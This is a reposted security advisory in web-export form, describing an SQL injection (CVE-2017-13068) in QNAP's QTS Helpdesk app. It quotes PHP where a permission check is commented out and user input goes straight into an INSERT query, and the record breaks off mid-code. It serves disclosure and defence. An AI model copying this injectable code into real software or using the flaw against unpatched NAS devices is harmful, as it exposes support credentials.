{"id":9766,"date":"2017-10-09T14:19:12","date_gmt":"2017-10-09T22:19:12","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/10\/09\/news-3539\/"},"modified":"2017-10-09T14:19:12","modified_gmt":"2017-10-09T22:19:12","slug":"news-3539","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/10\/09\/news-3539\/","title":{"rendered":"SSD Advisory \u2013 QNAP HelpDesk SQL Injection"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 09 Oct 2017 14:26:28 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3469\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3469');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a SQL injection found in QTS Helpdesk versions 1.1.12 and earlier.<\/p>\n<p>QNAP helpdesk: &#8220;Starting from QTS 4.2.2 you can use the built-in Helpdesk app to directly submit help requests to QNAP from your NAS. To do so, ensure your NAS can reach the Internet, open Helpdesk from the App Center, and create a new Help Request. Helpdesk will automatically collect and attach NAS system information and system logs to your request, and you can provide other information such as the steps necessary to reproduce the error, the error message and screenshots so we can identify the problem faster.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Kacper Szurek, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> QNAP has released patches to address this vulnerability.<\/p>\n<p>For more information: https:\/\/www.qnap.com\/en\/security-advisory\/nas-201709-29<\/p>\n<p>CVE: CVE-2017-13068<\/p>\n<p><span id=\"more-3469\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> In order to trigger the vulnerability, a user needs to have <code>Remote Support<\/code> option enabled.<\/p>\n<p>User controlled input is not sufficiently sanitized, by sending a CLI request to <em>www\/App\/Controllers\/Cli\/SupportUtils.php<\/em> an attacker can trigger an SQL injection and receive the password of the _qnap_support user.<\/p>\n<p>Code which is responsible for checking permissions is commented:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59dbf5dfdb107012006236\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`  \/\/ if (strtolower(php_sapi_name()) !== &#8216;cli&#8217;) {  \/\/  $this-&gt;fileLogModel-&gt;logError(&#8216;You can not use this function via web.&#8217;, __FILE__);  \/\/  die(&#8216;You can not use this function via web. File: &#8216; . __FILE__);  \/\/ }  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p>We can access <code><em>registerExternalLog<\/em><\/code> which executes <code><em>setExternalLog<\/em><\/code><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59dbf5dfdb110965480285\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`  public function registerExternalLog($appName, $appLogPath)  {   $supportUtils = $this-&gt;model(&#8216;SupportUtilsModel&#8217;);    if (file_exists($appLogPath) &amp;&amp; is_dir($appLogPath)) {   printf(&#8220;rn[%s] You should assign a log file, not folder.rn&#8221;, colorize($appName, &#8216;ERROR&#8217;));  } else if (file_exists($appLogPath) &amp;&amp; !is_dir($appLogPath)) {   if ($supportUtils-&gt;setExternalLog($appName, $appLogPath)) {    printf(&#8220;rn[%s] Log path %s was registered.rn&#8221;, colorize($appName, &#8216;SUCCESS&#8217;), colorize($appLogPath, &#8216;SUCCESS&#8217;));   } else {    printf(&#8220;rn[%s] Register external log failed.rn&#8221;, colorize($appName, &#8216;ERROR&#8217;), colorize($appLogPath, &#8216;ERROR&#8217;));   }   } else {   printf(&#8220;rn[%s] Log file not found.rn&#8221;, colorize($appName, &#8216;ERROR&#8217;));  }  }  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb110965480285-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb110965480285-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb110965480285-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb110965480285-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb110965480285-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb110965480285-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb110965480285-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb110965480285-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb110965480285-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb110965480285-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb110965480285-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb110965480285-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb110965480285-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb110965480285-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb110965480285-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb110965480285-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb110965480285-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb110965480285-18\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb110965480285-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb110965480285-2\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">registerExternalLog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appName<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appLogPath<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb110965480285-3\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb110965480285-4\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">supportUtils<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">model<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;SupportUtilsModel&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb110965480285-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb110965480285-6\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">file_exists<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appLogPath<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">is_dir<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appLogPath<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb110965480285-7\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;rn[%s] You should assign a log file, not folder.rn&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">colorize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appName<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;ERROR&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb110965480285-8\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">file_exists<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appLogPath<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">is_dir<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appLogPath<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb110965480285-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">supportUtils<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">setExternalLog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appName<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appLogPath<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb110965480285-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;rn[%s] Log path %s was registered.rn&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">colorize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appName<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;SUCCESS&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">colorize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appLogPath<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;SUCCESS&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb110965480285-11\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb110965480285-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;rn[%s] Register external log failed.rn&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">colorize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appName<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;ERROR&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">colorize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appLogPath<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;ERROR&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb110965480285-13\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb110965480285-14\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb110965480285-15\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;rn[%s] Log file not found.rn&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">colorize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appName<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;ERROR&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb110965480285-16\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb110965480285-17\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb110965480285-18\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0025 seconds] -->  <\/p>\n<p>We can see the SQL injection in <em>$appName<\/em> in <em>www\/App\/Models\/SupportUtilsModel.php<\/em><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59dbf5dfdb114220256354\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`  public function setExternalLog($appName, $appLogPath)  {   $now = time();   $queryStr = &#8220;INSERT INTO external_log (appName, appLogPath, createdTime) VALUES (&#8216;$appName&#8217;, &#8216;$appLogPath&#8217;, &#8216;$now&#8217;)&#8221;;   $rowCount = 0;     try {    $rowCount = $this-&gt;db-&gt;queryNoneResult($queryStr);   } catch (Exception $e) {    return false;   }     return $rowCount;  }  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb114220256354-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb114220256354-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb114220256354-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb114220256354-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb114220256354-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb114220256354-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb114220256354-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb114220256354-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb114220256354-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb114220256354-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb114220256354-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb114220256354-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb114220256354-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb114220256354-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb114220256354-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb114220256354-16\">16<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb114220256354-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb114220256354-2\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">setExternalLog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appName<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">appLogPath<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb114220256354-3\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb114220256354-4\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">now<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">time<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb114220256354-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">queryStr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;INSERT INTO external_log (appName, appLogPath, createdTime) VALUES (&#8216;$appName&#8217;, &#8216;$appLogPath&#8217;, &#8216;$now&#8217;)&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb114220256354-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">rowCount<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb114220256354-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb114220256354-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb114220256354-9\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">rowCount<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">queryNoneResult<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">queryStr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb114220256354-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-i\">Exception<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb114220256354-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb114220256354-12\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb114220256354-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb114220256354-14\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">rowCount<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb114220256354-15\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb114220256354-16\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span 